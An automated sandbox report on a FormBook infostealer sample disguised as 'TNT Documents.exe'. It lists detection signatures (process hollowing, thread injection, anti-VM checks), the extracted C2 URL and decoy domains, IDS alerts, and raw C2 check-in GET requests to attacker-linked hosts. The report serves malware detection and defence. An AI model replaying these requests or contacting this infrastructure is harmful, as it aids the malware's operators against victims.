Windows Analysis Report TNT Documents.exe

Overview

General Information

Sample Name: TNT Documents.exe
Analysis ID: 532859
MD5: f943d9ee79559042bfff9b4e55270cfa
SHA1: 7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
SHA256: 2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
Tags: exeFormbookTNT
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}
Multi AV Scanner detection for submitted file
Source: TNT Documents.exe ReversingLabs: Detection: 46%
Yara detected FormBook
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd Avira URL Cloud: Label: malware
Source: http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: TNT Documents.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.TNT Documents.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: TNT Documents.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: TNT Documents.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B103E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B10494
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B103D1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then pop edi 7_2_0040C3AE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then pop edi 7_2_00415681
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 4x nop then pop edi 17_2_0331C3AE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 4x nop then pop edi 17_2_03325681

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.metronixmedical.com
Source: C:\Windows\explorer.exe Domain query: www.specialtyplastics.online
Source: C:\Windows\explorer.exe Network Connect: 51.255.30.106 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 119.18.54.99 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.cortepuroiberico.com
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.coached.info
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.floridanratraining.com/how6/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1Host: www.cortepuroiberico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1Host: www.specialtyplastics.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.coached.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 209.17.116.163 209.17.116.163
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 17:59:48 GMTContent-Type: text/htmlContent-Length: 275ETag: "61a4f026-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.comx
Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.339769433.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.319305560.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.302126756.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264654507.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265913845.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265991532.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265846476.0000000005482000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designerss
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com=
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comF(
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comI.TTF
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comals
Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comcomo?
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comitud
Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.como
Source: TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: TNT Documents.exe, 00000000.00000003.256034110.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256133822.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.255970673.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256207995.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comX
Source: TNT Documents.exe, 00000000.00000003.258709539.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258597321.0000000005474000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.c
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnG
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cna
Source: TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnaX
Source: TNT Documents.exe, 00000000.00000003.258154475.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258083706.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnar
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/.comp
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/F
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/slnt
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/soft
Source: TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265384324.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265335700.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype.
Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.coma
Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.comus4
Source: TNT Documents.exe, 00000000.00000003.262108739.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262382693.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262663913.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262518900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262298913.0000000005482000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: TNT Documents.exe, 00000000.00000003.260239394.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comU
Source: TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comic
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267332900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267369494.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264299140.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.de
Source: TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.de2
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
